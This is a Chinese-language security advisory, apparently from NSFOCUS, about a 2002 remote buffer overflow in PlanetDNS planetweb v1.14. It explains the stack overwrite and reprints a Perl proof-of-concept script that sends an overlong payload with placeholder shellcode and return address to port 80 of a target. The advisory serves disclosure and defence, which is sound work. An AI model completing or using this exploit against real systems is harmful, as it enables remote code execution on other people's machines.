首页 -> 安全研究

安全研究

安全漏洞
planetDNS远程缓冲区溢出漏洞

发布日期:2002-10-17
更新日期:2002-10-21

受影响系统:
PlanetDNS plaetweb v1.14
描述:
planetdns是一款商业程序允许用户即使只有动态IP地址的情况下在自己电脑上建立WEB、FTP、邮件等服务器。

planetdns对用户超长请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以planetdns进程权限在系统上执行任意指令。

攻击者向planetdns服务程序发送多个1024字节请求可导致服务崩溃,而不使用'GET /'发送6500个字节可以覆盖堆栈中的EIP地址,精心构建提交数据可能以planetdns进程权限在系统上执行任意指令。

<*来源:securma massine (securma@caramail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103486987122111&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

securma massine(securma@caramail.com) 提供了如下测试程序:

#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
christal...plus tu pédales moins fort, moins tu #avances
plus vite..)
#


use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}


$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx
= eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with
(jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";

建议:
厂商补丁:

PlanetDNS
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.planetdns.net/

浏览次数:4302
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障